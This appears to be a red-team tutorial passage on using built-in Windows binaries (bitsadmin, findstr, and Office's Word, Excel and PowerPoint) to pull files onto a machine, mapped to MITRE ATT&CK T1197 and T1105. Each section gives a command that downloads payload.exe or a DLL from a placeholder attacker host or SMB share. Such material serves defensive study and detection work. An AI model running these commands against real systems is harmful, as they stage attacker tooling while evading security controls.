The bitsadmin tool is a system administrator utility that can be used to create, download or upload Background Intelligent Transfer Service (BITS) jobs and check their progress. BITS is a low-bandwidth and asynchronous method to download and upload files from HTTP webservers and SMB servers. Additional information about the bitsadmin tool can be found at Microsoft Docs.

#Dowload a file
bitsadmin.exe /transfer /Download /priority Foreground http://<ATTACKER_IP>/payload.exe c:\Users\Pwned\Desktop\payload.exe

The MITRE ATT&CK framework identifies this technique as BITS Job (T1197)

Findstr is a Microsoft built-in tool used to find text and string patterns in files. The findstr tool is useful in that helps users and system administrators to search within files or parsed output. However, an unintended way was found by using findstr.exe to download remote files from SMB shared folders within the network as follows,

#Dowload a file
findstr /V dummystring \\MachineName\ShareFolder\test.exe > c:\Windows\Temp\test.exe

he MITRE ATT&CK framework identifies this technique as Ingress tool transfer (T1105)

We may use binaries part of Office 365 (Word, Excel, Powerpoint) to download malicious payloads. It will download a remote payload and place it in the cache folder

#Dowload a file using PowerPoint
Powerpnt.exe "http://<ATTACKING_IP>/TeamsAddinLoader.dll"

#Dowload a file using Excel
Excel.exe http://<ATTACKING_IP>/TeamsAddinLoader.dll

#Dowload a file using Word
winword.exe "http://<ATTACKING_IP>/TeamsAddinLoader.dll"